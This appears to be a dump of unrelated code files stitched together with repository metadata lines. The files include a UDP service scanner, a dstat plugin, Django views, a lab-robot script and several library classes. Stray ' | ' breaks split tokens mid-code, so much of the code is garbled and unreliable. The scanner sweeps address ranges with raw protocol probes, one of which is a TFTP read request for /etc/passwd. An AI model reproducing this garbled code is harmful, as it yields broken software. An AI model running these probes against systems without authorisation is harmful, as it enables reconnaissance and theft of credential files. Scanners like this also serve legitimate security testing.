return self._import_frozen_module(fullname)
if self.desc[2] == imp.C_EXTENSION:
return self._import_extension_module(fullname)
# Check if this is a child of a shared package.
if not loadingShared and self.packagePath and '.' in fullname:
parentname = fullname.rsplit('.', 1)[0]
if parentname in sharedPackages:
# It is. That means it's a shared package too.
parent = sys.modules[parentname]
path = getattr(parent, '__path__', None)
importer = VFSSharedImporter()
sharedPackages[fullname] = True
loader = importer.find_module(fullname, path = path)
assert loader
return loader.load_module(fullname)
code = self._read_code()
if not code:
raise ImportError('No Python code in %s' % (fullname))
mod = sys.modules.setdefault(fullname, imp.new_module(fullname))
mod.__file__ = self.filename.toOsSpecific()
mod.__loader__ = self
if self.packagePath:
mod.__path__ = [self.packagePath.toOsSpecific()]
#print >> sys.stderr, "loaded %s, path = %s" % (fullname, mod.__path__)
exec(code, mod.__dict__)
return sys.modules[fullname]
def getdata(self, path):
path = Filename(self.dir_path, Filename.fromOsSpecific(path))
vfile = vfs.getFile(path)
if not vfile:
raise IOError("Could not find '%s'" % (path))
return vfile.readFile(True)
def is_package(self, fullname):
return bool(self.packagePath)
def get_code(self, fullname):
return self._read_code()
def get_source(self, fullname):
return self._read_source()
def get_filename(self, fullname):
return self.filename.toOsSpecific()
def _read_source(self):
""" Returns the Python source for this file, if it is
available, or None if it is not. May raise IOError. """
if self.desc[2] == imp.PY_COMPILED or \
self.desc[2] == imp.C_EXTENSION:
return None
filename = Filename(self.filename)
filename.setExtension('py')
filename.setText()
return open(filename, self.desc[1]).read()
def _import_extension_module(self, fullname):
""" Loads the binary shared object as a Python module, and
returns it. """
vfile = vfs.getFile(self.filename, False)
# We can only import an extension module if it already exists on
# disk. This means if it's a truly virtual file that has no
# on-disk equivalent, we have to write it to a temporary file
# first.
if hasattr(vfile, 'getMount') and \
isinstance(vfile.getMount(), VirtualFileMountSystem):
# It's a real file.
filename = self.filename
elif self.filename.exists():
# It's a virtual file, but it's shadowing a real file in
# the same directory. Assume they're the same, and load
# the real one.
filename = self.filename
else:
# It's a virtual file with no real-world existence. Dump
# it to disk. TODO: clean up this filename.
filename = Filename.temporary('', self.filename.getBasenameWoExtension(),
'.' + self.filename.getExtension(),
type = Filename.TDso)
filename.setExtension(self.filename.getExtension())
filename.setBinary()
sin = vfile.openReadFile(True)
sout = OFileStream()
if no |
nckx/dstat | plugins/dstat_vm_mem.py | Python | gpl-2.0 | 1,136 | 0.006162 | ### Author: Bert de Bruijn <bert+dstat$debruijn,be>
### VMware memory stats
### Displays memory stats coming from the hypervisor inside VMware VMs.
### The vmGuestLib API from | VMware Tools needs to be installed
class dstat_plugin(dstat):
def __init__(self):
self.name = 'vmware memory'
self.vars = ('active', 'balloone | d', 'mapped', 'swapped', 'used')
self.nick = ('active', 'balln', 'mappd', 'swapd', 'used')
self.type = 'd'
self.width = 5
self.scale = 1024
def check(self):
try:
global vmguestlib
import vmguestlib
self.gl = vmguestlib.VMGuestLib()
except:
raise Exception, 'Needs python-vmguestlib module'
def extract(self):
self.gl.UpdateInfo()
self.val['active'] = self.gl.GetMemActiveMB() * 1024 ** 2
self.val['ballooned'] = self.gl.GetMemBalloonedMB() * 1024 ** 2
self.val['mapped'] = self.gl.GetMemMappedMB() * 1024 ** 2
self.val['swapped'] = self.gl.GetMemSwappedMB() * 1024 ** 2
self.val['used'] = self.gl.GetMemUsedMB() * 1024 ** 2
# vim:ts=4:sw=4 |
dev-zzo/pwn-tools | scanners/udp-probe.py | Python | unlicense | 7,615 | 0.003414 | #!/usr/bin/python
"""
UDP Service Scanner version 0.1 by dev_zzo
This work has largely been inspired by:
https://github.com/portcullislabs/udp-proto-scanner
As is, this is more like a prober than scanner;
it operates using predefined probes for each known protocol.
"""
import argparse
import socket
import struct
import time
__scan_spec = (
# port, service name, probe
(53, 'DNSStatusRequest',
"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
(53, 'DNSVersionBindReq',
"\x00\x06\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x07\x76\x65\x72\x73\x69\x6f\x6e\x04\x62\x69\x6e\x64\x00\x00\x10\x00\x03"),
(69, 'tftp', "\x00\x01/etc/passwd\x00netascii\x00"),
(111, 'rpc',
"\x03\x9b\x65\x42\x00\x00\x00\x00\x00\x00\x00\x02\x00\x0f\x42\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
(111, 'RPCCheck',
"\x72\xFE\x1D\x13\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xA0\x00\x01\x97\x7C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
(123, 'ntp',
"\xcb\x00\x04\xfa\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbf\xbe\x70\x99\xcd\xb3\x40\x00"),
(123, 'NTPRequest',
"\xe3\x00\x04\xfa\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc5\x4f\x23\x4b\x71\xb1\x52\xf3"),
(137, 'NBTStat', "\x80\xf0\x00\x10\x00\x01\x00\x00\x00\x00\x00\x00\x20\x43\x4b\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x21\x00\x01"),
# SNMP v1 GetRequest PDU, with community=public
(161, 'SNMPv1GetRequest-public',
"\x30\x82\x00\x2f\x02\x01\x00\x04\x06\x70\x75\x62\x6c\x69\x63\xa0\x82\x00\x20\x02\x04\x4c\x33\xa7\x56\x02\x01\x00\x02\x01\x00\x30\x82\x00\x10\x30\x82\x00\x0c\x06\x08\x2b\x06\x01\x02\x01\x01\x05\x00\x05\x00"),
# SNMP v3 GetRequest PDU, no auth, no priv, contextEngineID=0, contextName=0
# Unlikely to work...
(161, 'SNMPv3GetRequest',
"\x30\x3a\x02\x01\x03\x30\x0f\x02\x02\x4a\x69\x02\x03\x00\xff\xe3\x04\x01\x04\x02\x01\x03\x04\x10\x30\x0e\x04\x00\x02\x01\x00\x02\x01\x00\x04\x00\x04\x00\x04\x00\x30\x12\x04\x00\x04\x00\xa0\x0c\x02\x02\x37\xf0\x02\x01\x00\x02\x01\x00\x30\x00"),
(177, 'xdmcp', "\x00\x01\x00\x02\x00\x01\x00\x00"),
(500, 'ike', "\x5b\x5e\x64\xc0\x3e\x99\xb5\x11\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x02\x00\x00\x00\x00\x00\x00\x00\x01\x50\x00\x00\x01\x34\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x01\x28\x01\x01\x00\x08\x03\x00\x00\x24\x01\x01"),
(523, 'db2', "DB2GETADDR\x00SQL08020"),
(1434, 'ms-sql', "\x02"),
(1434, 'ms-sql-slam', "\x0A"),
(1604, 'citrix', "\x1e\x00\x01\x30\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
(5405, 'net-support', "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
(6502, 'netop', "\xd6\x81\x81\x52\x00\x00\x00\xf3\x87\x4e\x01\x02\x32\x00\xa8\xc0\x00\x00\x01\x13\xc1\xd9\x04\xdd\x03\x7d\x00\x00\x0d\x00\x54\x48\x43\x54\x48\x43\x54\x48\x43\x54\x48\x43\x54\x48\x43\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x02\x32\x00\xa8\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
)
def ip2long(ipaddr):
return long(struct.unpack('!L', socket.inet_aton(ipaddr))[0])
def long2ip(ipaddr):
return socket.inet_ntoa(struct.pack('!L', ipaddr))
def __dump_bytes(data):
return ' '.join([('%02X' % ord(x)) for x in data])
def __dump_chars(data):
return ''.join([(x if 0x20 <= ord(x) < 0x80 else '.') for x in data])
def dump(data):
i = 0
lines = []
while i < len(data):
line = data[i:(i + 16)]
p1 = __dump_bytes(line[:8])
p2 = __dump_bytes(line[8:]) if len(line) > 8 else ''
lines.append('%08X %-24s %-24s %s' % (i, p1, p2, __dump_chars(line)))
i += 16
return "\n".join(lines)
def parse_targets(targets):
"Parse the target specs provided by the user"
results = []
for target_spec in targets:
if '/' in target_spec:
# a.b.c.d/m ?
net_addr, net_mask = target_spec.split('/')
net_addr = ip2long(net_addr)
net_mask = int(net_mask)
dev_mask = (1 << (32 - net_mask)) - 1
net_addr = net_addr & ~dev_mask
# First address is not allocated, last address is broadcast
for i in xrange(1, dev_mask):
addr = long2ip(net_addr + i)
results.append(addr)
elif '-' in target_spec:
# a.b.c.d-e.f.g.h ?
start_addr, end_addr = target_spec.split('-')
addr = ip2long(start_addr)
end_addr = ip2long(end_addr)
while addr <= end_addr:
addr_str | = long2ip(addr)
results.append(addr_str)
addr += 1
else:
addr = ip2long(target_spec)
results.append(target_spec)
return results
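# Illustrative example:
#   parse_targets(['10.0.0.0/30', '10.0.1.1-10.0.1.3'])
#   -> ['10.0.0.1', '10.0.0.2', '10.0.1.1', '10.0.1.2', '10.0.1.3']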
def scan_main(args):
"Main scanning routine"
global __scan_spec
targets = parse_targets(args.targets)
responses = {}
print("Starting scan.")
s = socket.socket(socket.AF_INET, socket.SO | CK_DGRAM)
s.bind(('', 57022))
try:
for port, name, probe in __scan_spec:
print("Running probe '%s'..." % name)
s.settimeout(None)
for target in targets:
s.sendto(probe, (target, port))
s.settimeout(0.0)
# print("Waiting for replies...")
time.sleep(args.delay)
while True:
try:
response, addr = s.recvfrom(16384)
# print("Response from %s:%d" % addr)
try:
target_responses = responses[addr]
except KeyError:
target_responses = responses[addr] = {}
target_responses[name] = response
except socket.error as e:
# http://stackoverflow.com/a/2578794/1654774
# ICMP Port Unreachable can't be handled properly. :-(
if e.args[0] in (11, 10035):
break
if e.args[0] not in (10054,):
raise
finally:
s.close()
print("Scan completed.")
for addr, target_responses in responses.iteritems():
print('')
print('=' * 76)
print("Report for %s:" % addr[0])
print('=' * 76)
for name, response in target_responses.iteritems():
print('')
print("Probe: %s, port: %d" % (name, addr[1]))
print(dump(response))
def __main():
print('\nUDP Service Scanner version 0.1\n')
parser = argparse.ArgumentParser(description='UDP Service Scanner')
parser.add_argument('targets', metavar='target', nargs='+',
help='IP address or range (ip/mask, ip-ip)')
parser.add_argument('--delay',
type=float,
default=1.0,
help='Time to wait (seconds) before moving on to the next probe')
args = parser.parse_args()
scan_main(args)
if __name__ == '__main__':
__main()
|
DailyActie/Surrogate-Model | 01-codes/OpenMDAO-Framework-dev/openmdao.util/src/openmdao/util/__init__.py | Python | mit | 137 | 0.007299 | """
This package contains a number of utilities that are used inside o | f openmdao.
It does n | ot depend on any other openmdao package.
"""
|
rfugger/villagescc | cc/relate/views.py | Python | agpl-3.0 | 5,122 | 0.002148 | from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404
from django.http import HttpResponseRedirect, Http404
from django.db.models import Q
from django.contrib import messages
from cc.general.util import render
import cc.ripple.api as ripple
from cc.profile.models import Profile
from cc.relate.forms import EndorseForm, AcknowledgementForm
from cc.relate.models import Endorsement
from cc.feed.models import FeedItem
from cc.general.mail import send_notification
from django.utils.translation import ugettext as _
MESSAGES = {
'endorsement_saved': _("Endorsement saved."),
'endorsement_deleted': _("Endorsement deleted."),
'acknowledgement_sent': _("Acknowledgement sent."),
}
@login_required
@render()
def endorse_user(request, recipient_username):
recipient = get_object_or_404(Profile, user__username=recipient_username)
if recipient == request.profile:
raise Http404()
try:
endorsement = Endorsement.objects.get(
endorser=request.profile, recipient=recipient)
except Endorsement.DoesNotExist:
endorsement = None
if request.method == 'POST':
if 'delete' in request.POST and endorsement:
endorsement.delete()
messages.info(request, MESSAGES['endorsement_deleted'])
return HttpResponseRedirect(
endorsement.recipient.get_absolute_url())
form = EndorseForm(request.POST, instance=endorsement,
endorser=request.profile, recipient=recipient)
if form.is_valid():
is_new = endorsement is None
endorsement = form.save()
if is_new:
send_endorsement_notification(endorsement)
messages.info(request, MESSAGES['endorsement_saved'])
return HttpResponseRedirect(endorsement.get_absolute_url())
else:
form = EndorseForm(instance=endorsement, endorser=request.profile,
recipient=recipient)
profile = recipient # For profile_base.html.
return locals()
def send_endorsement_notification(endorsement):
subject = _("%s has endorsed you on Villages.cc") % endorsement.endorser
send_notification(subject, endorsement.endorser, endorsement.recipient,
'endorsement_notification_email.txt',
{'endorsement': endorsement})
@login_required
@render()
def endorsement(request, endorsement_id):
endorsement = get_object_or_404(Endorsement, pk=endorsement_id)
return locals()
@login_required
@render()
def relationships(request):
accounts = ripple.get_user_accounts(request.profile)
return locals()
@login_required
@render()
def relationship(request, partner_username):
partner = get_object_or_404(Profile, user__username=partner_username)
if partner == request.profile:
raise Http404 # Can't have relationship with yourself.
account = request.profile.account(partner)
if account:
entries = account.entries
balance = account.balance
else:
entries = []
balance = 0
profile = partner # For profile_base.html.
return locals()
@login_required
@render()
def acknowledge_user(request, recipient_username):
recipient = get_object_or_404(Profile, user__username=recipient_username)
if recipient == request.profile:
raise Http404
# TODO: Don't recompute max_amount on form submit? Cache, or put in form
# as hidden field?
max_amount = ripple.max_payment(request.profile, recipient)
if request.method == 'POST': |
form = AcknowledgementForm(request.POST, max_ripple=max_amount)
if form.is_valid():
| acknowledgement = form.send_acknowledgement(
request.profile, recipient)
send_acknowledgement_notification(acknowledgement)
messages.info(request, MESSAGES['acknowledgement_sent'])
return HttpResponseRedirect(acknowledgement.get_absolute_url())
else:
form = AcknowledgementForm(max_ripple=max_amount, initial=request.GET)
can_ripple = max_amount > 0
profile = recipient # For profile_base.html.
return locals()
def send_acknowledgement_notification(acknowledgement):
subject = _("%s has acknowledged you on Villages.cc") % (
acknowledgement.payer)
send_notification(subject, acknowledgement.payer, acknowledgement.recipient,
'acknowledgement_notification_email.txt',
{'acknowledgement': acknowledgement})
@login_required
@render()
def view_acknowledgement(request, payment_id):
try:
payment = ripple.get_payment(payment_id)
except ripple.RipplePayment.DoesNotExist:
raise Http404
entries = payment.entries_for_user(request.profile)
if not entries:
raise Http404 # Non-participants don't get to see anything.
sent_entries = []
received_entries = []
for entry in entries:
if entry.amount < 0:
sent_entries.append(entry)
else:
received_entries.append(entry)
return locals()
|
tdlong/YeastRobot | UserPrograms/ASE/Mon_ToBeads_3.py | Python | gpl-3.0 | 2,655 | 0.050094 | import sys
# where RobotControl.py, etc lives
sys.path.append('/home/pi/Desktop/ADL/YeastRobot/PythonLibrary')
from RobotControl import *
#################################
### Define Deck Layout
#################################
deck="""\
DW96P DW96P DW96W DW96W BLANK
DW96P DW96P DW96W DW96W BLANK
DW96P DW96P DW96W DW96W BLANK
BLANK BLANK BLANK BLANK BLANK
"""
# 2 3 4 5 6
# note the 1st user defined column is "2" not zero or one, since tips are at 0 & 1
# This takes ~36m to run in total
##################################
# Assume there is a Pellet in each well
OffsetDict={0: 'UL', 1: 'UR', 2: 'LL', 3: 'LR'}
# read in deck, etc
DefineDeck(deck)
printDeck()
InitializeRobot()
CurrentTipPosition = 1
for row in [0,1,2]:
for offset in [0,1,2,3]:
#get tips
CurrentTipPosition = retrieveTips(CurrentTipPosition)
extraSeatTips()
adjusted_depth = 94 + row
#aspirate 300 ul then 250 ul of Tween20 (C2) -> discard to DW96W at C4 (x2)
position(row,2,position = OffsetDict[offset])
aspirate(300,depth=adjusted_depth - 4,speed=50, mix=0)
position(row,4, position = OffsetDict[offset])
dispense(300, depth=adjusted_depth - 18, speed=50)
position(row,2,position = OffsetDict[offset])
aspirate(250,depth=adjusted_depth + 2,speed=50, mix=0)
position(row,4, position = OffsetDict[offset])
dispense(250, depth=adjusted_depth - 28, speed=50)
# | pick up 2 * 200ul of SDS from C5, add to C2
position(row,5,position = OffsetDict[offset])
aspirate(200,depth=adjusted_dept | h + 2,speed=50, mix=0)
position(row,2,position = OffsetDict[offset])
dispense(200, depth=adjusted_depth + 3, speed=100)
position(row,5,position = OffsetDict[offset])
aspirate(200,depth=adjusted_depth + 2,speed=50, mix=0)
position(row,2,position = OffsetDict[offset])
dispense(200, depth=adjusted_depth - 2, speed=100)
# initial mix
position(row,2,position = OffsetDict[offset])
mix(300,adjusted_depth - 4,100,5)
# 2 * 200 being careful of beads preloaded in 96 well plate
# from DW96 to DW96 loaded with beads
position(row,2,position = OffsetDict[offset])
aspirate(200, depth=adjusted_depth + 1,speed=50, mix=0)
position(row,3,position = OffsetDict[offset])
dispense(200, depth=adjusted_depth - 25, speed=50)
position(row,2,position = OffsetDict[offset])
mix(300,adjusted_depth + 5,100,5)
position(row,2,position = OffsetDict[offset])
aspirate(200, depth=adjusted_depth + 6,speed=50, mix=0)
position(row,3,position = OffsetDict[offset])
dispense(200, depth=adjusted_depth - 39, speed=50)
#disposeTips()
manualDisposeTips()
position(0,0)
ShutDownRobot()
quit()
|
migueldiascosta/easybuild-framework | easybuild/toolchains/gmpich2.py | Python | gpl-2.0 | 1,420 | 0.001408 | ##
# Copyright 2012-2017 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is dist | ributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a co | py of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for gmpich2 compiler toolchain (includes GCC and MPICH2).
:author: Kenneth Hoste (Ghent University)
"""
from easybuild.toolchains.gcc import GccToolchain
from easybuild.toolchains.mpi.mpich2 import Mpich2
class Gmpich2(GccToolchain, Mpich2):
"""Compiler toolchain with GCC and MPICH2."""
NAME = 'gmpich2'
SUBTOOLCHAIN = GccToolchain.NAME
|
amwelch/a10sdk-python | a10sdk/core/ip/ip_dns_suffix.py | Python | apache-2.0 | 1,146 | 0.010471 | from a10sdk.common.A10BaseClass import A10BaseClass
class Suffix(A10BaseClass):
"""Class Description::
DNS suffix.
Class suffix supports CRUD Operations and inherits from `common | /A10BaseClass`.
This class is the `"PARENT"` class for this module.`
:param domain_name: {"description": "DNS suf | fix", "format": "string", "minLength": 1, "optional": true, "maxLength": 32, "type": "string"}
:param uuid: {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/ip/dns/suffix`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "suffix"
self.a10_url="/axapi/v3/ip/dns/suffix"
self.DeviceProxy = ""
self.domain_name = ""
self.uuid = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
|
magic0704/oslo.db | oslo_db/sqlalchemy/models.py | Python | apache-2.0 | 4,841 | 0 | # Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Piston Cloud Computing, Inc.
# Copyright 2012 Cloudscaling Group, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or imp | lied. See the
# License for the specific language governing permissions and limitations
# under | the License.
"""
SQLAlchemy models.
"""
import six
from oslo_utils import timeutils
from sqlalchemy import Column, Integer
from sqlalchemy import DateTime
from sqlalchemy.orm import object_mapper
class ModelBase(six.Iterator):
"""Base class for models."""
__table_initialized__ = False
def save(self, session):
"""Save this object."""
# NOTE(boris-42): This part of code should look like:
# session.add(self)
# session.flush()
# But there is a bug in sqlalchemy and eventlet that
# raises NoneType exception if there is no running
# transaction and rollback is called. As long as
# sqlalchemy has this bug we have to create transaction
# explicitly.
with session.begin(subtransactions=True):
session.add(self)
session.flush()
def __setitem__(self, key, value):
setattr(self, key, value)
def __getitem__(self, key):
return getattr(self, key)
def __contains__(self, key):
# Don't use hasattr() because hasattr() catches any exception, not only
# AttributeError. We want to passthrough SQLAlchemy exceptions
# (ex: sqlalchemy.orm.exc.DetachedInstanceError).
try:
getattr(self, key)
except AttributeError:
return False
else:
return True
def get(self, key, default=None):
return getattr(self, key, default)
@property
def _extra_keys(self):
"""Specifies custom fields
Subclasses can override this property to return a list
of custom fields that should be included in their dict
representation.
For reference check tests/db/sqlalchemy/test_models.py
"""
return []
def __iter__(self):
columns = list(dict(object_mapper(self).columns).keys())
# NOTE(russellb): Allow models to specify other keys that can be looked
# up, beyond the actual db columns. An example would be the 'name'
# property for an Instance.
columns.extend(self._extra_keys)
return ModelIterator(self, iter(columns))
def update(self, values):
"""Make the model object behave like a dict."""
for k, v in six.iteritems(values):
setattr(self, k, v)
def _as_dict(self):
"""Make the model object behave like a dict.
Includes attributes from joins.
"""
local = dict((key, value) for key, value in self)
joined = dict([(k, v) for k, v in six.iteritems(self.__dict__)
if not k[0] == '_'])
local.update(joined)
return local
def iteritems(self):
"""Make the model object behave like a dict."""
return six.iteritems(self._as_dict())
def items(self):
"""Make the model object behave like a dict."""
return self._as_dict().items()
def keys(self):
"""Make the model object behave like a dict."""
return [key for key, value in self.iteritems()]
class ModelIterator(six.Iterator):
def __init__(self, model, columns):
self.model = model
self.i = columns
def __iter__(self):
return self
# In Python 3, __next__() has replaced next().
def __next__(self):
n = six.advance_iterator(self.i)
return n, getattr(self.model, n)
class TimestampMixin(object):
created_at = Column(DateTime, default=lambda: timeutils.utcnow())
updated_at = Column(DateTime, onupdate=lambda: timeutils.utcnow())
class SoftDeleteMixin(object):
deleted_at = Column(DateTime)
deleted = Column(Integer, default=0)
def soft_delete(self, session):
"""Mark this object as deleted."""
self.deleted = self.id
self.deleted_at = timeutils.utcnow()
self.save(session=session)
|
avocadoinnocenceproject/farflungfruit | render.py | Python | mit | 303 | 0.006601 | from jinja2 import Template
import codecs
def render(file, props=None):
if props is None:
return '404'
with | codecs.open('./views/' + file + '.html', 'r', encoding='utf8') as f:
content = f.read()
templated = Template(content).render(props)
return templ | ated
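# Illustrative example (hypothetical template file): render('index',
# {'title': 'Fruit'}) reads ./views/index.html and substitutes {{ title }}
# through Jinja2's Template.render().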
|
zstars/weblabdeusto | server/admin/cli/migrate_db_40m1_to_50/migrationlib.py | Python | bsd-2-clause | 4,717 | 0.007844 | import sys, os
sys.path.append(os.sep.join(("..","..","..","src")))
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
import traceback
import MySQLdb as dbi
import weblab.db.model as Model
########################################################
#
# Abstract class. All classes implementing this class
# will provide a "check" method, which will focus on
# checking if the patch must be applied or it has already
# been applied, and a method "apply" which will work
# in case the patch had not been applied.
#
class Patch(object):
ABSTRACT = False
SQL_FORMAT = 'SQL'
SQLALCHEMY_FORMAT = 'sqlalchemy'
CHECK_FORMAT = SQL_FORMAT
APPLY_FORMAT = SQL_FORMAT
def __init__(self, user, password, db):
self.user = user
self.db = db
self.password = password
def execute(self):
connection_url = "mysql://%(USER)s:%(PASS)s@%(HOST)s/%(NAME)s" % {
"USER": self.user,
"PASS": self.password,
"HOST": "localhost",
"NAME": self.db }
self.engine = create_engine(connection_url, convert_unicode=True, echo=False)
Session = sessionmaker(bind=self.engine)
session = Session()
try:
connection = dbi.connect(host="localhost", user=self.user, passwd=self.password, db=self.db)
try:
cursor = connection.cursor()
try:
print "Checking %s..." % type(self).__name__,
if self.CHECK_FORMAT == self.SQL_FORMAT:
check_arg = cursor
else:
check_arg = session
try:
applicable = self.check(check_arg)
except:
print "[ERROR CHECKING]"
print
traceback.print_exc()
print
applicable = False
if applicable:
print "[NOT APPLIED]"
print "Applying %s..." % type(self).__name__,
try:
if self.APPLY_FORMAT == self.SQL_FORMAT:
self.apply(cursor)
connection.commit()
else:
self.apply(session)
session.commit()
except:
print "[FAIL]"
print
traceback.print_exc()
print
else:
print "[OK]"
else:
print "[already applied]"
finally:
cursor.close()
finally:
connection.close()
finally:
session.close()
def check(self, cursor):
raise NotImplementedError("Not implemented!")
def apply(self, cursor):
raise NotImplementedError("Not implemented!")
class PatchApplier(object):
def __init__(self, user, password, dbs, order):
self.user = user
self.password = password
if isinstance(dbs, basestring):
self.dbs = [dbs]
else:
self.dbs = dbs
self.order = order
def execute(self, force = False):
for klass in Patch.__subclasses__():
if not klass.ABSTRACT and not klass in self.order:
print "WARNING: Class %s not found in provided order: " % klass.__name__,
if force:
print "[skipped]"
else:
print "[aborted]"
raise Exception("Class %s not found in provided order. Call execute(force=True) if this is correct" % klass.__name__)
for db in self.dbs:
print "Applying patches to %s" % db
# Always recreate all the tables
connection_url = "mysql://%(USER)s:%(PASS)s@%(HOST)s/%(NAME)s" % {
"USER": self.user,
"PASS": self.password,
"HOST": "localhost",
| "NAME": db }
engine = create_engine(connection_url, convert_unicode=True, echo=False)
Model.Base.metadata.create_all(engine)
for klass in self.order:
fix = klass(self.user, self.password, db)
fix.exec | ute()
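# Illustrative example (hypothetical schema change): a concrete patch whose
# check() returns True only while the patch still needs to be applied.
#
# class AddUserEmail(Patch):
#     def check(self, cursor):
#         cursor.execute("SHOW COLUMNS FROM User LIKE 'email'")
#         return cursor.fetchone() is None
#     def apply(self, cursor):
#         cursor.execute("ALTER TABLE User ADD COLUMN email VARCHAR(255)")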
|
USGSDenverPychron/pychron | pychron/hardware/newport/newport_group.py | Python | apache-2.0 | 2,866 | 0.000349 | # ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from traits.api import Float, Tuple
# ============= standard library imports ========================
# ============= local library imports ==========================
from pychron.core.helpers.strtools import csv_to_ints
from pychron.hardware.axis import Axis
MAP | PING = dict(
acceleration="HA",
deceleration="HD",
# emergency_deceleration = 'HE',
jerk="HJ",
velocity="HV",
axes="HN",
)
class NewportGroup(Axis):
# acceleration = Float
# deceleration = Float
emergency_deceleration = None
jerk = Float
# velocity = Float
name = "GroupedAxes"
machine_velocity = Float
machine_acceleration = Float
machine_decele | ration = Float
axes = Tuple
# calculate_parameters = Bool(True)
id = None
def _set_acceleration(self, v):
self._acceleration = v
def _set_deceleration(self, v):
self._deceleration = v
def _set_velocity(self, v):
self._velocity = v
def load(self, path):
config = self.get_configuration(path)
for attr in [
"acceleration",
"deceleration",
# 'emergency_deceleration',
"jerk",
"velocity",
]:
self.set_attribute(config, attr, "General", attr, cast="float")
self.set_attribute(config, "id", "General", "id", cast="int")
axes = self.config_get(config, "General", "axes")
self.axes = tuple(csv_to_ints(axes))
self.nominal_velocity = self.velocity
self.nominal_acceleration = self.acceleration
self.nominal_deceleration = self.deceleration
def build_command(self, new_group):
cmds = []
for key, value in MAPPING.items():
if key != "axes":
cmds.append("{}{}{:0.5f}".format(self.id, value, getattr(self, key)))
if new_group:
gid = "{:n}HN{}".format(self.id, ",".join(map(str, self.axes)))
cmds = [gid] + cmds
return ";".join(cmds)
# ============= EOF ==============================================
|
obsoleter/suds | suds/umx/__init__.py | Python | lgpl-3.0 | 1,849 | 0.002704 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( jortel@redhat.com )
"""
Provides modules containing classes to support
unmarshalling (XML).
"""
from suds.sudsobject import Object
class Content(Object):
"""
@ivar node: The content source node.
@type node: L{sax.element.Element}
@ivar data: The (optional) content data.
@type data: L{Object}
@ivar text: The (optional) content (xml) text.
